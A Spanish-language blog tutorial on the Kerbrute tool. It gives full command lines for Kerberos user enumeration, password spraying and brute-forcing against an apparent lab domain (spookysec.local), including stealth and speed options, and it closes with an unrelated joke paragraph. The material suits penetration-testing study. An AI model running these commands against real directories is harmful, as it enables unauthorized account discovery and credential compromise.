
Kerbrute es una poderosa herramienta para la enumeración de usuarios y ataques de autenticación en Active Directory a través del protocolo Kerberos. En esta guía, aprenderás cómo descargarla, instalarla y utilizarla en diferentes escenarios.
🐺¿Qué es Kerbrute y para qué sirve?
Kerbrute es una herramienta de código abierto escrita en Go por ropnop que permite:
✔ Enumeración de usuarios en un dominio Active Directory.
✔ Ataques de fuerza bruta contra contraseñas de usuarios.
✔ Password Spraying para probar una contraseña en múltiples cuentas sin generar bloqueos masivos.
🔺Cómo descargar e instalar Kerbrute
Para obtener Kerbrute, puedes descargar el binario precompilado desde su repositorio en GitHub:
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
Si quieres compilarlo desde el código fuente:
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build
Ahora ya puedes ejecutar kerbrute.
Modos de uso de Kerbrute
🔺Enumeración de usuarios (User Enumeration)
La enumeración de usuarios nos permite identificar qué cuentas existen en un dominio de Active Directory.
./kerbrute_linux_amd64 userenum -d spookysec.local –dc 10.10.47.59 userlist.txt
Explicación:
- userenum → Modo de enumeración de usuarios.
- -d spookysec.local → Dominio objetivo.
- –dc 10.10.47.59 → IP del Controlador de Dominio.
- userlist.txt → Lista de usuarios a probar.
Si un usuario existe, el servidor responderá de manera diferente a si no existe, lo que nos permitirá identificar cuentas válidas.
Aquí te muestro un ejemplo en video:
🔺Password Spraying (ataque de contraseña única a múltiples usuarios)
Este ataque es útil para probar una sola contraseña en múltiples usuarios y evitar bloqueos de cuentas:
./kerbrute_linux_amd64 passwordspray -d spookysec.local –dc 10.10.47.59 userlist.txt -p «Password123»
Explicación:
- passwordspray → Modo de ataque de contraseña única.
- -p «Password123» → Contraseña que queremos probar.
Este método es más sigiloso que un ataque de fuerza bruta tradicional.
🔺Ataque de fuerza bruta completo
Si queremos probar múltiples combinaciones de usuarios y contraseñas, usamos bruteforce.
❌ Error común: Este modo no acepta dos archivos (usuarios y contraseñas separados). Debemos combinar los datos en un solo archivo:
paste -d ‘:’ userlist.txt passwordlist.txt > user_pass.txt
Ejecutamos el ataque:
./kerbrute_linux_amd64 bruteforce -d spookysec.local –dc 10.10.47.59 user_pass.txt
Explicación:
- bruteforce → Prueba todas las combinaciones de usuario:contraseña.
- user_pass.txt → Archivo con formato usuario:contraseña en cada línea.
🔺Opciones avanzadas de Kerbrute
Podemos optimizar el rendimiento del escaneo usando estos parámetros:
Aumentar la velocidad con más hilos:
./kerbrute_linux_amd64 userenum -d spookysec.local –dc 10.10.47.59 userlist.txt –threads 15
Guardar resultados en un archivo:
./kerbrute_linux_amd64 passwordspray -d spookysec.local –dc 10.10.47.59 userlist.txt -p «Password123» –output resultados.txt
Modo silencioso (menos logs en pantalla):
./kerbrute_linux_amd64 bruteforce -d spookysec.local –dc 10.10.47.59 user_pass.txt –quiet
Conclusiones
Me gustaría decir, que esta herramienta me ha hecho «la vida mas fácil» hablando de directorios activos, también tenéis una versión en Python con diferentes opciones nuevas a está, espero que os haya gustado el post.
Mira que majo el bicho de abajo si es que es un tío cojonudo no se mete con nadie va a la suya y tiene un corazón enorme. De hecho yo iba mal económicamente y este pedazo de capullo me dijo: tío se que te va mal y estas buscando pillarte un piso, pues no te preocupes yo te pago la entrada y ya me lo darás cuándo puedas.
Aun se me saltan las lagrimas a día de hoy. Comparte este post para que mas gente conozca la historia de este gran simio.
